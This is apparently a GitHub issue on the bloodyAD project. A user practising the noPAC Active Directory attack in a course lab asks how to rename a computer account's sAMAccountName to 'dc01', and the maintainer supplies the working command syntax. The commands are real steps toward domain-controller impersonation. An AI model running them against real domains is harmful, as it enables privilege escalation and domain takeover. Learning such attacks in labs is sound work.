Can I modify a computer sAMAccountName through bloodyAD ?
blabut opened this issue · comments
Hi,
I am trying to exploit the noPAC vulnerabilities in a step-by-step, kind of manual way for understanding purposes as I read thought an AD exploitation course. One step of the exploitation process includes modifying the name of a freshly created computer account. I would think this action is doable with bloodyAD but am struggling to actually perform it.
Here the command I'm using and the ouput I get:
# I can get the sAMAccountName of my newly created computer
$ proxychains bloodyad -u user -p 'pass' -d inlanefreight.local --host 172.16.5.5 get object 'cptr$' --attr sAMAccountName
{
"sAMAccountName": "cptr$"
}
# I am now trying to set it to a new value but can't
$ proxychains bloodyad -u user -p 'pass' -d inlanefreight.local --host 172.16.5.5 set object 'cptr$' sAMAccountName 'dc01'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng
usage: bloodyad set [-h] {password} ...
bloodyad set: error: argument {password}: invalid choice: 'object' (choose from 'password')
Shouldn't this normally work ? I am a bit confused by the documentation which has three subsections for "set" actions: set object
, set password
and set owner
. Is set object
an actual command or just a kind of placeholder to refer to the set password
and set owner
?
Thank you very much !
Hello, I agree the error message is a bit confusing.
set object
is indeed an actual command that is documented here or you can do set object -h
for more information. You'll see that you have to provide the -v
option flag to pass a value which will end up as set object 'cptr$' sAMAccountName -v 'dc01'
.
Tell me if everything works